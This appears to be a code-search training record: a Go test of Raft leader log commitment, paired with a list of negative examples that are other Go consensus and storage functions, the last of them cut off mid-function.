func TestLeaderCommitEntry(t *testing.T) { s := NewMemoryStorage() r := newTestRaft(1, []uint64{1, 2, 3}, 10, 1, s) defer closeAndFreeRaft(r) r.becomeCandidate() r.becomeLeader() commitNoopEntry(r, s) li := r.raftLog.lastIndex() r.Step(pb.Message{From: 1, To: 1, Type: pb.MsgProp, Entries: []pb.Entry{{Data: []byte("some data")}}}) for _, m := range r.readMessages() { r.Step(acceptAndReply(m)) } if g := r.raftLog.committed; g != li+1 { t.Errorf("committed = %d, want %d", g, li+1) } wents := []pb.Entry{{Index: li + 1, Term: 1, Data: []byte("some data")}} if g := r.raftLog.nextEnts(); !reflect.DeepEqual(g, wents) { t.Errorf("nextEnts = %+v, want %+v", g, wents) } msgs := r.readMessages() sort.Sort(messageSlice(msgs)) for i, m := range msgs { if w := uint64(i + 2); m.To != w { t.Errorf("to = %x, want %x", m.To, w) } if m.Type != pb.MsgApp { t.Errorf("type = %v, want %v", m.Type, pb.MsgApp) } if m.Commit != li+1 { t.Errorf("commit = %d, want %d", m.Commit, li+1) } } }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func TestFollowerCommitEntry(t *testing.T) {\n\ttests := []struct {\n\t\tents []pb.Entry\n\t\tcommit uint64\n\t}{\n\t\t{\n\t\t\t[]pb.Entry{\n\t\t\t\t{Term: 1, Index: 1, Data: []byte(\"some data\")},\n\t\t\t},\n\t\t\t1,\n\t\t},\n\t\t{\n\t\t\t[]pb.Entry{\n\t\t\t\t{Term: 1, Index: 1, Data: []byte(\"some data\")},\n\t\t\t\t{Term: 1, Index: 2, Data: []byte(\"some data2\")},\n\t\t\t},\n\t\t\t2,\n\t\t},\n\t\t{\n\t\t\t[]pb.Entry{\n\t\t\t\t{Term: 1, Index: 1, Data: []byte(\"some data2\")},\n\t\t\t\t{Term: 1, Index: 2, Data: []byte(\"some data\")},\n\t\t\t},\n\t\t\t2,\n\t\t},\n\t\t{\n\t\t\t[]pb.Entry{\n\t\t\t\t{Term: 1, Index: 1, Data: []byte(\"some data\")},\n\t\t\t\t{Term: 1, Index: 2, Data: []byte(\"some data2\")},\n\t\t\t},\n\t\t\t1,\n\t\t},\n\t}\n\tfor i, tt := range tests {\n\t\tr := newTestRaft(1, []uint64{1, 2, 3}, 10, 1, NewMemoryStorage())\n\t\tdefer closeAndFreeRaft(r)\n\t\tr.becomeFollower(1, 2)\n\n\t\tr.Step(pb.Message{From: 2, To: 1, Type: pb.MsgApp, Term: 1, Entries: tt.ents, Commit: tt.commit})\n\n\t\tif g := r.raftLog.committed; g != tt.commit {\n\t\t\tt.Errorf(\"#%d: committed = %d, want %d\", i, g, tt.commit)\n\t\t}\n\t\twents := tt.ents[:int(tt.commit)]\n\t\tif g := r.raftLog.nextEnts(); !reflect.DeepEqual(g, wents) {\n\t\t\tt.Errorf(\"#%d: nextEnts = %v, want %v\", i, g, wents)\n\t\t}\n\t}\n}", "func TestLeaderAcknowledgeCommit(t *testing.T) {\n\ttests := []struct {\n\t\tsize int\n\t\tacceptors map[uint64]bool\n\t\twack bool\n\t}{\n\t\t{1, nil, true},\n\t\t{3, nil, false},\n\t\t{3, map[uint64]bool{2: true}, true},\n\t\t{3, map[uint64]bool{2: true, 3: true}, true},\n\t\t{5, nil, false},\n\t\t{5, map[uint64]bool{2: true}, false},\n\t\t{5, map[uint64]bool{2: true, 3: true}, true},\n\t\t{5, map[uint64]bool{2: true, 3: true, 4: true}, true},\n\t\t{5, map[uint64]bool{2: true, 3: true, 4: true, 5: true}, true},\n\t}\n\tfor i, tt := range tests {\n\t\ts := NewMemoryStorage()\n\t\tr := newTestRaft(1, idsBySize(tt.size), 10, 1, s)\n\t\tdefer closeAndFreeRaft(r)\n\t\tr.becomeCandidate()\n\t\tr.becomeLeader()\n\t\tcommitNoopEntry(r, s)\n\t\tli := r.raftLog.lastIndex()\n\t\tr.Step(pb.Message{From: 1, To: 1, Type: pb.MsgProp, Entries: []pb.Entry{{Data: []byte(\"some data\")}}})\n\n\t\tfor _, m := range r.readMessages() {\n\t\t\tif tt.acceptors[m.To] {\n\t\t\t\tr.Step(acceptAndReply(m))\n\t\t\t}\n\t\t}\n\n\t\tif g := r.raftLog.committed > li; g != tt.wack {\n\t\t\tt.Errorf(\"#%d: ack commit = %v, want %v\", i, g, tt.wack)\n\t\t}\n\t}\n}", "func TestCommitWithoutNewTermEntry(t *testing.T) {\n\ttt := newNetwork(nil, nil, nil, nil, nil)\n\tdefer tt.closeAll()\n\ttt.send(pb.Message{From: 1, To: 1, Type: pb.MsgHup})\n\n\t// 0 cannot reach 2,3,4\n\ttt.cut(1, 3)\n\ttt.cut(1, 4)\n\ttt.cut(1, 5)\n\n\ttt.send(pb.Message{From: 1, To: 1, Type: pb.MsgProp, Entries: []pb.Entry{{Data: []byte(\"some data\")}}})\n\ttt.send(pb.Message{From: 1, To: 1, Type: pb.MsgProp, Entries: []pb.Entry{{Data: []byte(\"some data\")}}})\n\n\tsm := tt.peers[1].(*raft)\n\tif sm.raftLog.committed != 1 {\n\t\tt.Errorf(\"committed = %d, want %d\", sm.raftLog.committed, 1)\n\t}\n\n\t// network recovery\n\ttt.recover()\n\n\t// elect 1 as the new leader with term 2\n\t// after append a ChangeTerm entry from the current term, all entries\n\t// should be committed\n\ttt.send(pb.Message{From: 2, To: 2, Type: pb.MsgHup})\n\n\tif sm.raftLog.committed != 4 {\n\t\tt.Errorf(\"committed = %d, want %d\", sm.raftLog.committed, 4)\n\t}\n}", "func (s *raftState) checkLeaderCommit() bool {\n\tmatches := make([]int, 0, len(s.MatchIndex))\n\tfor _, x := range s.MatchIndex {\n\t\tmatches = append(matches, x)\n\t}\n\tsort.Sort(sort.Reverse(sort.IntSlice(matches)))\n\tnewC := matches[s.majority()-1]\n\tif newC > s.CommitIndex {\n\t\ts.commitUntil(newC)\n\t\tglog.V(utils.VDebug).Infof(\"%s Leader update commitIndex: %d\", s.String(), newC)\n\t\treturn true\n\t}\n\treturn false\n}", "func TestLeaderStartReplication(t *testing.T) {\n\ts := NewMemoryStorage()\n\tr := newTestRaft(1, []uint64{1, 2, 3}, 10, 1, s)\n\tdefer closeAndFreeRaft(r)\n\tr.becomeCandidate()\n\tr.becomeLeader()\n\tcommitNoopEntry(r, s)\n\tli := r.raftLog.lastIndex()\n\n\tents := []pb.Entry{{Data: []byte(\"some data\")}}\n\tr.Step(pb.Message{From: 1, To: 1, Type: pb.MsgProp, Entries: ents})\n\n\tif g := r.raftLog.lastIndex(); g != li+1 {\n\t\tt.Errorf(\"lastIndex = %d, want %d\", g, li+1)\n\t}\n\tif g := r.raftLog.committed; g != li {\n\t\tt.Errorf(\"committed = %d, want %d\", g, li)\n\t}\n\tmsgs := r.readMessages()\n\tsort.Sort(messageSlice(msgs))\n\twents := []pb.Entry{{Index: li + 1, Term: 1, Data: []byte(\"some data\")}}\n\twmsgs := []pb.Message{\n\t\t{From: 1, FromGroup: pb.Group{NodeId: 1, GroupId: 1, RaftReplicaId: 1},\n\t\t\tTo: 2, ToGroup: pb.Group{NodeId: 2, GroupId: 1, RaftReplicaId: 2}, Term: 1, Type: pb.MsgApp, Index: li, LogTerm: 1, Entries: wents, Commit: li},\n\t\t{From: 1, FromGroup: pb.Group{NodeId: 1, GroupId: 1, RaftReplicaId: 1},\n\t\t\tTo: 3, ToGroup: pb.Group{NodeId: 3, GroupId: 1, RaftReplicaId: 3}, Term: 1, Type: pb.MsgApp, Index: li, LogTerm: 1, Entries: wents, Commit: li},\n\t}\n\tif !reflect.DeepEqual(msgs, wmsgs) {\n\t\tt.Errorf(\"msgs = %+v, want %+v\", msgs, wmsgs)\n\t}\n\tif g := r.raftLog.unstableEntries(); !reflect.DeepEqual(g, wents) {\n\t\tt.Errorf(\"ents = %+v, want %+v\", g, wents)\n\t}\n}", "func (s *raftServer) updateLeaderCommitIndex(followers []int, matchIndex *utils.SyncIntIntMap) {\n\n\tfor s.State() == LEADER {\n\t\tN := s.commitIndex.Get() + 1\n\t\tupto := N + 1\n\n\t\tfor N <= upto {\n\n\t\t\tif !s.localLog.Exists(N) {\n\t\t\t\tbreak\n\t\t\t}\n\n\t\t\ti := 1\n\t\t\tfor _, f := range followers {\n\t\t\t\tif j, _ := matchIndex.Get(f); j >= N {\n\t\t\t\t\ti++\n\t\t\t\t\tupto = max(upto, j)\n\t\t\t\t}\n\t\t\t}\n\t\t\t// followers do not include Leader\n\t\t\tif entry := s.localLog.Get(N); i > (len(followers)+1)/2 && entry.Term == s.Term() {\n\t\t\t\ts.writeToLog(\"Updating commitIndex to \" + strconv.FormatInt(N, 10))\n\t\t\t\ts.commitIndex.Set(N)\n\t\t\t}\n\t\t\tN++\n\t\t}\n\t\ttime.Sleep(NICE * time.Millisecond)\n\t}\n}", "func TestCannotCommitWithoutNewTermEntry(t *testing.T) {\n\ttt := newNetwork(nil, nil, nil, nil, nil)\n\tdefer tt.closeAll()\n\ttt.send(pb.Message{From: 1, To: 1, Type: pb.MsgHup})\n\n\t// 0 cannot reach 2,3,4\n\ttt.cut(1, 3)\n\ttt.cut(1, 4)\n\ttt.cut(1, 5)\n\n\ttt.send(pb.Message{From: 1, To: 1, Type: pb.MsgProp, Entries: []pb.Entry{{Data: []byte(\"some data\")}}})\n\ttt.send(pb.Message{From: 1, To: 1, Type: pb.MsgProp, Entries: []pb.Entry{{Data: []byte(\"some data\")}}})\n\n\tsm := tt.peers[1].(*raft)\n\tif sm.raftLog.committed != 1 {\n\t\tt.Errorf(\"committed = %d, want %d\", sm.raftLog.committed, 1)\n\t}\n\n\t// network recovery\n\ttt.recover()\n\t// avoid committing ChangeTerm proposal\n\ttt.ignore(pb.MsgApp)\n\n\t// elect 2 as the new leader with term 2\n\ttt.send(pb.Message{From: 2, To: 2, Type: pb.MsgHup})\n\n\t// no log entries from previous term should be committed\n\tsm = tt.peers[2].(*raft)\n\tif sm.raftLog.committed != 1 {\n\t\tt.Errorf(\"committed = %d, want %d\", sm.raftLog.committed, 1)\n\t}\n\n\ttt.recover()\n\t// send heartbeat; reset wait\n\ttt.send(pb.Message{From: 2, To: 2, Type: pb.MsgBeat})\n\t// append an entry at current term\n\ttt.send(pb.Message{From: 2, To: 2, Type: pb.MsgProp, Entries: []pb.Entry{{Data: []byte(\"some data\")}}})\n\t// expect the committed to be advanced\n\tif sm.raftLog.committed != 5 {\n\t\tt.Errorf(\"committed = %d, want %d\", sm.raftLog.committed, 5)\n\t}\n}", "func (f *Ocean) PutEntry(entry string, result *responses.Result) error {\n // PutEntry can be called by the client while it is searching\n // for the leader. If so, respond with leader information\n if raft.Role != spec.LEADER {\n log.Printf(\"[PUTENTRY]: REDIRECTING client to leader at %d:%s\", raft.LeaderId, self.MemberMap[raft.LeaderId].IP)\n *result = responses.Result{\n Data: fmt.Sprintf(\"%d,%s\", raft.LeaderId, self.MemberMap[raft.LeaderId].IP),\n Success: false,\n Error: responses.LEADERREDIRECT,\n }\n return nil\n }\n log.Printf(\"[PUTENTRY]: BEGINNING PutEntry() FOR: %s\", tr(entry, 20))\n\n entryCh := make(chan *responses.Result)\n commCh := make(chan *responses.Result)\n\n // Add new entry to log for processing\n entries <- entryC{entry, entryCh}\n\n select {\n case r := <-entryCh:\n r.Entry = entry\n if r.Success {\n // The entry was successfully processed.\n // Now apply to our own state.\n // - The program will explode if the state application fails.\n commits <- commitC{r.Index, commCh}\n *result = *<-commCh\n }\n case <-time.After(time.Second * time.Duration(config.C.RPCTimeout)):\n config.LogIf(fmt.Sprintf(\"[PUTENTRY]: PutEntry timed out waiting for quorum\"), config.C.LogPutEntry)\n *result = responses.Result{Term: raft.CurrentTerm, Success: false}\n }\n\n return nil\n}", "func TestUpdateEntry(t *testing.T) {\n\tif testing.Short() {\n\t\tt.SkipNow()\n\t}\n\thdbt, err := newHDBTesterDeps(t.Name(), &disableScanLoopDeps{})\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n\n\t// Test 1: try calling updateEntry with a blank host. Result should be a\n\t// host with len 2 scan history.\n\tsomeErr := errors.New(\"testing err\")\n\tentry1 := modules.HostDBEntry{\n\t\tPublicKey: types.SiaPublicKey{\n\t\t\tKey: []byte{1},\n\t\t},\n\t}\n\tentry2 := modules.HostDBEntry{\n\t\tPublicKey: types.SiaPublicKey{\n\t\t\tKey: []byte{2},\n\t\t},\n\t}\n\n\t// Try inserting the first entry. Result in the host tree should be a host\n\t// with a scan history length of two.\n\thdbt.hdb.updateEntry(entry1, nil)\n\tupdatedEntry, exists := hdbt.hdb.hostTree.Select(entry1.PublicKey)\n\tif !exists {\n\t\tt.Fatal(\"Entry did not get inserted into the host tree\")\n\t}\n\tif len(updatedEntry.ScanHistory) != 2 {\n\t\tt.Fatal(\"new entry was not given two scanning history entries\")\n\t}\n\tif !updatedEntry.ScanHistory[0].Timestamp.Before(updatedEntry.ScanHistory[1].Timestamp) {\n\t\tt.Error(\"new entry was not provided with a sorted scanning history\")\n\t}\n\tif !updatedEntry.ScanHistory[0].Success || !updatedEntry.ScanHistory[1].Success {\n\t\tt.Error(\"new entry was not given success values despite a successful scan\")\n\t}\n\n\t// Try inserting the second entry, but with an error. Results should largely\n\t// be the same.\n\thdbt.hdb.updateEntry(entry2, someErr)\n\tupdatedEntry, exists = hdbt.hdb.hostTree.Select(entry2.PublicKey)\n\tif !exists {\n\t\tt.Fatal(\"Entry did not get inserted into the host tree\")\n\t}\n\tif len(updatedEntry.ScanHistory) != 2 {\n\t\tt.Fatal(\"new entry was not given two scanning history entries\")\n\t}\n\tif !updatedEntry.ScanHistory[0].Timestamp.Before(updatedEntry.ScanHistory[1].Timestamp) {\n\t\tt.Error(\"new entry was not provided with a sorted scanning history\")\n\t}\n\tif updatedEntry.ScanHistory[0].Success || updatedEntry.ScanHistory[1].Success {\n\t\tt.Error(\"new entry was not given success values despite a successful scan\")\n\t}\n\n\t// Insert the first entry twice more, with no error. There should be 4\n\t// entries, and the timestamps should be strictly increasing.\n\thdbt.hdb.updateEntry(entry1, nil)\n\thdbt.hdb.updateEntry(entry1, nil)\n\tupdatedEntry, exists = hdbt.hdb.hostTree.Select(entry1.PublicKey)\n\tif !exists {\n\t\tt.Fatal(\"Entry did not get inserted into the host tree\")\n\t}\n\tif len(updatedEntry.ScanHistory) != 4 {\n\t\tt.Fatal(\"new entry was not given two scanning history entries\")\n\t}\n\tif !updatedEntry.ScanHistory[1].Timestamp.Before(updatedEntry.ScanHistory[2].Timestamp) {\n\t\tt.Error(\"new entry was not provided with a sorted scanning history\")\n\t}\n\tif !updatedEntry.ScanHistory[2].Timestamp.Before(updatedEntry.ScanHistory[3].Timestamp) {\n\t\tt.Error(\"new entry was not provided with a sorted scanning history\")\n\t}\n\tif !updatedEntry.ScanHistory[2].Success || !updatedEntry.ScanHistory[3].Success {\n\t\tt.Error(\"new entries did not get added with successful timestamps\")\n\t}\n\n\t// Add a non-successful scan and verify that it is registered properly.\n\thdbt.hdb.updateEntry(entry1, someErr)\n\tupdatedEntry, exists = hdbt.hdb.hostTree.Select(entry1.PublicKey)\n\tif !exists {\n\t\tt.Fatal(\"Entry did not get inserted into the host tree\")\n\t}\n\tif len(updatedEntry.ScanHistory) != 5 {\n\t\tt.Fatal(\"new entry was not given two scanning history entries\")\n\t}\n\tif !updatedEntry.ScanHistory[3].Success || updatedEntry.ScanHistory[4].Success {\n\t\tt.Error(\"new entries did not get added with successful timestamps\")\n\t}\n\n\t// Prefix an invalid entry to have a scan from more than maxHostDowntime\n\t// days ago. At less than minScans total, the host should not be deleted\n\t// upon update.\n\tupdatedEntry, exists = hdbt.hdb.hostTree.Select(entry2.PublicKey)\n\tif !exists {\n\t\tt.Fatal(\"Entry did not get inserted into the host tree\")\n\t}\n\tupdatedEntry.ScanHistory = append([]modules.HostDBScan{{}}, updatedEntry.ScanHistory...)\n\terr = hdbt.hdb.hostTree.Modify(updatedEntry)\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n\t// Entry should still exist.\n\tupdatedEntry, exists = hdbt.hdb.hostTree.Select(entry2.PublicKey)\n\tif !exists {\n\t\tt.Fatal(\"Entry did not get inserted into the host tree\")\n\t}\n\t// Add enough entries to get to minScans total length. When that length is\n\t// reached, the entry should be deleted.\n\tfor i := len(updatedEntry.ScanHistory); i < minScans; i++ {\n\t\thdbt.hdb.updateEntry(entry2, someErr)\n\t}\n\t// The entry should no longer exist in the hostdb, wiped for being offline.\n\tupdatedEntry, exists = hdbt.hdb.hostTree.Select(entry2.PublicKey)\n\tif exists {\n\t\tt.Fatal(\"entry should have been purged for being offline for too long\")\n\t}\n\n\t// Trigger compression on entry1 by adding a past scan and then adding\n\t// unsuccessful scans until compression happens.\n\tupdatedEntry, exists = hdbt.hdb.hostTree.Select(entry1.PublicKey)\n\tif !exists {\n\t\tt.Fatal(\"Entry did not get inserted into the host tree\")\n\t}\n\tupdatedEntry.ScanHistory = append([]modules.HostDBScan{{Timestamp: time.Now().Add(maxHostDowntime * -1).Add(time.Hour * -1)}}, updatedEntry.ScanHistory...)\n\terr = hdbt.hdb.hostTree.Modify(updatedEntry)\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n\tfor i := len(updatedEntry.ScanHistory); i <= minScans; i++ {\n\t\thdbt.hdb.updateEntry(entry1, someErr)\n\t}\n\t// The result should be compression, and not the entry getting deleted.\n\tupdatedEntry, exists = hdbt.hdb.hostTree.Select(entry1.PublicKey)\n\tif !exists {\n\t\tt.Fatal(\"entry should not have been purged for being offline for too long\")\n\t}\n\tif len(updatedEntry.ScanHistory) != minScans {\n\t\tt.Error(\"expecting a different number of scans\", len(updatedEntry.ScanHistory))\n\t}\n\tif updatedEntry.HistoricDowntime == 0 {\n\t\tt.Error(\"host reporting historic downtime?\")\n\t}\n\tif updatedEntry.HistoricUptime != 0 {\n\t\tt.Error(\"host not reporting historic uptime?\")\n\t}\n\n\t// Repeat triggering compression, but with uptime this time.\n\tupdatedEntry, exists = hdbt.hdb.hostTree.Select(entry1.PublicKey)\n\tif !exists {\n\t\tt.Fatal(\"Entry did not get inserted into the host tree\")\n\t}\n\tupdatedEntry.ScanHistory = append([]modules.HostDBScan{{Success: true, Timestamp: time.Now().Add(time.Hour * 24 * 11 * -1)}}, updatedEntry.ScanHistory...)\n\terr = hdbt.hdb.hostTree.Modify(updatedEntry)\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n\thdbt.hdb.updateEntry(entry1, someErr)\n\t// The result should be compression, and not the entry getting deleted.\n\tupdatedEntry, exists = hdbt.hdb.hostTree.Select(entry1.PublicKey)\n\tif !exists {\n\t\tt.Fatal(\"entry should not have been purged for being offline for too long\")\n\t}\n\tif len(updatedEntry.ScanHistory) != minScans+1 {\n\t\tt.Error(\"expecting a different number of scans\")\n\t}\n\tif updatedEntry.HistoricUptime == 0 {\n\t\tt.Error(\"host not reporting historic uptime?\")\n\t}\n}", "func TestRaftSingleNodeCommit(t *testing.T) {\n\tID1 := \"1\"\n\tclusterPrefix := \"TestRaftSingleNodeCommit\"\n\n\t// Create the Raft node.\n\tfsm := newTestFSM(ID1)\n\tcfg := getTestConfig(ID1, clusterPrefix+ID1)\n\tcfg.LeaderStepdownTimeout = cfg.FollowerTimeout\n\tn := testCreateRaftNode(cfg, newStorage())\n\tn.Start(fsm)\n\tn.ProposeInitialMembership([]string{ID1})\n\n\t// Wait it becomes leader.\n\t<-fsm.leaderCh\n\n\t// Propose 10 commands.\n\tfor i := 0; i < 10; i++ {\n\t\tn.Propose([]byte(\"I'm data-\" + strconv.Itoa(i)))\n\t}\n\n\t// These 10 proposed entries should be applied eventually.\n\tfor i := 0; i < 10; i++ {\n\t\t<-fsm.appliedCh\n\t}\n}", "func (instance *cache) CommitEntry(key string, content Cacheable) (ce *Entry, xerr fail.Error) {\n\tif instance.isNull() {\n\t\treturn nil, fail.InvalidInstanceError()\n\t}\n\tif key = strings.TrimSpace(key); key == \"\" {\n\t\treturn nil, fail.InvalidParameterCannotBeEmptyStringError(\"key\")\n\t}\n\n\tinstance.lock.Lock()\n\tdefer instance.lock.Unlock()\n\n\treturn instance.unsafeCommitEntry(key, content)\n}", "func TestCommitAfterRemoveNode(t *testing.T) {\n\t// Create a cluster with two nodes.\n\ts := NewMemoryStorage()\n\tr := newTestRaft(1, []uint64{1, 2}, 5, 1, s)\n\tdefer closeAndFreeRaft(r)\n\tr.becomeCandidate()\n\tr.becomeLeader()\n\n\t// Begin to remove the second node.\n\tcc := pb.ConfChange{\n\t\tType: pb.ConfChangeRemoveNode,\n\t\tReplicaID: 2,\n\t}\n\tccData, err := cc.Marshal()\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n\tr.Step(pb.Message{\n\t\tType: pb.MsgProp,\n\t\tEntries: []pb.Entry{\n\t\t\t{Type: pb.EntryConfChange, Data: ccData},\n\t\t},\n\t})\n\t// Stabilize the log and make sure nothing is committed yet.\n\tif ents := nextEnts(r, s); len(ents) > 0 {\n\t\tt.Fatalf(\"unexpected committed entries: %v\", ents)\n\t}\n\tccIndex := r.raftLog.lastIndex()\n\n\t// While the config change is pending, make another proposal.\n\tr.Step(pb.Message{\n\t\tType: pb.MsgProp,\n\t\tEntries: []pb.Entry{\n\t\t\t{Type: pb.EntryNormal, Data: []byte(\"hello\")},\n\t\t},\n\t})\n\n\t// Node 2 acknowledges the config change, committing it.\n\tr.Step(pb.Message{\n\t\tType: pb.MsgAppResp,\n\t\tFrom: 2,\n\t\tIndex: ccIndex,\n\t})\n\tents := nextEnts(r, s)\n\tif len(ents) != 2 {\n\t\tt.Fatalf(\"expected two committed entries, got %v\", ents)\n\t}\n\tif ents[0].Type != pb.EntryNormal || ents[0].Data != nil {\n\t\tt.Fatalf(\"expected ents[0] to be empty, but got %v\", ents[0])\n\t}\n\tif ents[1].Type != pb.EntryConfChange {\n\t\tt.Fatalf(\"expected ents[1] to be EntryConfChange, got %v\", ents[1])\n\t}\n\n\t// Apply the config change. This reduces quorum requirements so the\n\t// pending command can now commit.\n\tr.removeNode(2)\n\tents = nextEnts(r, s)\n\tif len(ents) != 1 || ents[0].Type != pb.EntryNormal ||\n\t\tstring(ents[0].Data) != \"hello\" {\n\t\tt.Fatalf(\"expected one committed EntryNormal, got %v\", ents)\n\t}\n}", "func TestCommit(t *testing.T) {\n\tconst n = 4\n\tctrl := gomock.NewController(t)\n\ths := New()\n\tkeys := testutil.GenerateKeys(t, n, testutil.GenerateECDSAKey)\n\tbl := testutil.CreateBuilders(t, ctrl, n, keys...)\n\tacceptor := mocks.NewMockAcceptor(ctrl)\n\texecutor := mocks.NewMockExecutor(ctrl)\n\tsynchronizer := synchronizer.New(testutil.FixedTimeout(1000))\n\tcfg, replicas := testutil.CreateMockConfigWithReplicas(t, ctrl, n, keys...)\n\tbl[0].Register(hs, cfg, acceptor, executor, synchronizer, leaderrotation.NewFixed(2))\n\thl := bl.Build()\n\tsigners := hl.Signers()\n\n\t// create the needed blocks and QCs\n\tgenesisQC := hotstuff.NewQuorumCert(nil, 0, hotstuff.GetGenesis().Hash())\n\tb1 := testutil.NewProposeMsg(hotstuff.GetGenesis().Hash(), genesisQC, \"1\", 1, 2)\n\tb1QC := testutil.CreateQC(t, b1.Block, signers)\n\tb2 := testutil.NewProposeMsg(b1.Block.Hash(), b1QC, \"2\", 2, 2)\n\tb2QC := testutil.CreateQC(t, b2.Block, signers)\n\tb3 := testutil.NewProposeMsg(b2.Block.Hash(), b2QC, \"3\", 3, 2)\n\tb3QC := testutil.CreateQC(t, b3.Block, signers)\n\tb4 := testutil.NewProposeMsg(b3.Block.Hash(), b3QC, \"4\", 4, 2)\n\n\t// the second replica will be the leader, so we expect it to receive votes\n\treplicas[1].EXPECT().Vote(gomock.Any()).AnyTimes()\n\treplicas[1].EXPECT().NewView(gomock.Any()).AnyTimes()\n\n\t// executor will check that the correct command is executed\n\texecutor.EXPECT().Exec(gomock.Any()).Do(func(arg interface{}) {\n\t\tif arg.(hotstuff.Command) != b1.Block.Command() {\n\t\t\tt.Errorf(\"Wrong command executed: got: %s, want: %s\", arg, b1.Block.Command())\n\t\t}\n\t})\n\n\t// acceptor expects to receive the commands in order\n\tgomock.InOrder(\n\t\tacceptor.EXPECT().Proposed(gomock.Any()),\n\t\tacceptor.EXPECT().Accept(hotstuff.Command(\"1\")).Return(true),\n\t\tacceptor.EXPECT().Proposed(hotstuff.Command(\"1\")),\n\t\tacceptor.EXPECT().Accept(hotstuff.Command(\"2\")).Return(true),\n\t\tacceptor.EXPECT().Proposed(hotstuff.Command(\"2\")),\n\t\tacceptor.EXPECT().Accept(hotstuff.Command(\"3\")).Return(true),\n\t\tacceptor.EXPECT().Proposed(hotstuff.Command(\"3\")),\n\t\tacceptor.EXPECT().Accept(hotstuff.Command(\"4\")).Return(true),\n\t)\n\n\ths.OnPropose(b1)\n\ths.OnPropose(b2)\n\ths.OnPropose(b3)\n\ths.OnPropose(b4)\n}", "func testCommit(t *testing.T, myApp app.BaseApp, h int64) []byte {\n\t// Commit first block, make sure non-nil hash\n\theader := abci.Header{Height: h}\n\tmyApp.BeginBlock(abci.RequestBeginBlock{Header: header})\n\tmyApp.EndBlock(abci.RequestEndBlock{})\n\tcres := myApp.Commit()\n\thash := cres.Data\n\tassert.NotEmpty(t, hash)\n\treturn hash\n}", "func TestOneEntry(t *testing.T) {\n\tm, err := NewMerkleTree()\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n\n\tvar commit [32]byte\n\tvar expect [32]byte\n\n\tkey := \"key\"\n\tval := []byte(\"value\")\n\tindex := staticVRFKey.Compute([]byte(key))\n\tif err := m.Set(index, key, val); err != nil {\n\t\tt.Fatal(err)\n\t}\n\tm.recomputeHash()\n\n\t// Check empty node hash\n\th := sha3.NewShake128()\n\th.Write([]byte{EmptyBranchIdentifier})\n\th.Write(m.nonce)\n\th.Write(utils.ToBytes([]bool{true}))\n\th.Write(utils.UInt32ToBytes(1))\n\th.Read(expect[:])\n\tif !bytes.Equal(m.root.rightHash, expect[:]) {\n\t\tt.Error(\"Wrong righ hash!\",\n\t\t\t\"expected\", expect,\n\t\t\t\"get\", m.root.rightHash)\n\t}\n\n\tr := m.Get(index)\n\tif r.Leaf.Value == nil {\n\t\tt.Error(\"Cannot find value of key:\", key)\n\t\treturn\n\t}\n\tv := r.Leaf.Value\n\tif !bytes.Equal(v, val) {\n\t\tt.Errorf(\"Value mismatch %v / %v\", v, val)\n\t}\n\n\t// Check leaf node hash\n\th.Reset()\n\th.Write(r.Leaf.Commitment.Salt)\n\th.Write([]byte(key))\n\th.Write(val)\n\th.Read(commit[:])\n\n\th.Reset()\n\th.Write([]byte{LeafIdentifier})\n\th.Write(m.nonce)\n\th.Write(index)\n\th.Write(utils.UInt32ToBytes(1))\n\th.Write(commit[:])\n\th.Read(expect[:])\n\n\tif !bytes.Equal(m.root.leftHash, expect[:]) {\n\t\tt.Error(\"Wrong left hash!\",\n\t\t\t\"expected\", expect,\n\t\t\t\"get\", m.root.leftHash)\n\t}\n\n\tr = m.Get([]byte(\"abc\"))\n\tif r.Leaf.Value != nil {\n\t\tt.Error(\"Invalid look-up operation:\", key)\n\t\treturn\n\t}\n}", "func (rf *Raft) FollowerCommit(leaderCommit int, m int) {\n\t//fmt.Printf(\"hi:%v \\n\", p)\n\tp := rf.commitIndex\n\tif leaderCommit > rf.commitIndex {\n\t\tif leaderCommit < m {\n\t\t\trf.commitIndex = leaderCommit\n\t\t} else {\n\t\t\trf.commitIndex = m\n\t\t}\n\t}else{\n\t\t//fmt.Printf(\"leaderCommit:%v rf.commitIndex:%v \\n\", leaderCommit, rf.commitIndex)\n\t}\n\tfor p++; p <= rf.commitIndex; p++ {\n\t\trf.applyCh <- ApplyMsg{Index:p, Command:rf.log[p-rf.log[0].Index].Command}\n\t\trf.lastApplied = p\n\t}\n\t//fmt.Printf(\"done \\n\")\n\t//fmt.Printf(\"server %v term %v role %v last append %v \\n\", rf.me, rf.currentTerm, rf.role, rf.lastApplied)\n}", "func TestReadOnlyForNewLeader(t *testing.T) {\n\tnodeConfigs := []struct {\n\t\tid uint64\n\t\tcommitted uint64\n\t\tapplied uint64\n\t\tcompact_index uint64\n\t}{\n\t\t{1, 1, 1, 0},\n\t\t{2, 2, 2, 2},\n\t\t{3, 2, 2, 2},\n\t}\n\tpeers := make([]stateMachine, 0)\n\tfor _, c := range nodeConfigs {\n\t\tstorage := NewMemoryStorage()\n\t\tdefer storage.Close()\n\t\tstorage.Append([]pb.Entry{{Index: 1, Term: 1}, {Index: 2, Term: 1}})\n\t\tstorage.SetHardState(pb.HardState{Term: 1, Commit: c.committed})\n\t\tif c.compact_index != 0 {\n\t\t\tstorage.Compact(c.compact_index)\n\t\t}\n\t\tcfg := newTestConfig(c.id, []uint64{1, 2, 3}, 10, 1, storage)\n\t\tcfg.Applied = c.applied\n\t\traft := newRaft(cfg)\n\t\tpeers = append(peers, raft)\n\t}\n\tnt := newNetwork(peers...)\n\n\t// Drop MsgApp to forbid peer a to commit any log entry at its term after it becomes leader.\n\tnt.ignore(pb.MsgApp)\n\t// Force peer a to become leader.\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgHup})\n\n\tsm := nt.peers[1].(*raft)\n\tif sm.state != StateLeader {\n\t\tt.Fatalf(\"state = %s, want %s\", sm.state, StateLeader)\n\t}\n\n\t// Ensure peer a drops read only request.\n\tvar windex uint64 = 4\n\twctx := []byte(\"ctx\")\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgReadIndex, Entries: []pb.Entry{{Data: wctx}}})\n\tif len(sm.readStates) != 0 {\n\t\tt.Fatalf(\"len(readStates) = %d, want zero\", len(sm.readStates))\n\t}\n\n\tnt.recover()\n\n\t// 